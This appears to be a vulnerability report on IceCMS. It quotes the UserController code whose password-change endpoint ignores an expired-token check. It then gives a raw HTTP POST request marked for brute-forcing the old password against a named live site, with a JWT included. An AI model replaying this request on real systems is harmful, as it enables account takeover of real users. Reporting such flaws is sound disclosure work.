change the user password by brute force cracking

[QuanYex]

The impact code in IceCMS/IceWk-ment/src/main/java/com/ttice/icewkment/controller/UserController.java：

if(!claims){
//前端接收后进行处理
Result.fail(403,"Token已过期",null);
}
//验证之前密码是否正确
QueryWrapper wrapper = new QueryWrapper<>();
wrapper.eq("user_id",userid);
User usercheak = userMapper.selectOne(wrapper);
String password = usercheak.getPassword();
if(Objects.equals(password, yuanPassWord)) {
User user = new User();
user.setUserId(userid);
user.setPassword(NewPassWord);
userMapper.updateById(user);
return Result.succ(200, "修改成功", null);
}
Changing the password does not need to verify the current jwt, so after getting this api address, Hacker can change the password by brute force cracking ，especially when the user password is weak。

[QuanYex]

[QuanYex]

package：

POST /api/User/ChangePassword/1/§whoami123§/whoami1234/189 HTTP/1.1
Host: www.macwk.cc
Content-Length: 0
Sec-Ch-Ua: "Chromium";v="118", "Google Chrome";v="118", "Not=A?Brand";v="99"
Accept: application/json, text/plain, /
Sec-Ch-Ua-Mobile: ?0
Authorization: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwicm9sZSI6ImFkbWluIiwic3ViIjoiMTg5IiwiZXhwIjoxNzAyMTkyMjM0LCJqdGkiOiIzMjI2MzhmYi1mYmVmLTRmNTAtOGNkZi0xNzc1OTAxZTYyZjUifQ.oAxC-fkZzbU3iJoz279DeEPAye61xRjpl43BRuS8aUw
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Sec-Ch-Ua-Platform: "Windows"
Origin: https://www.macwk.cc
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://www.macwk.cc/userinfo/changePw
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close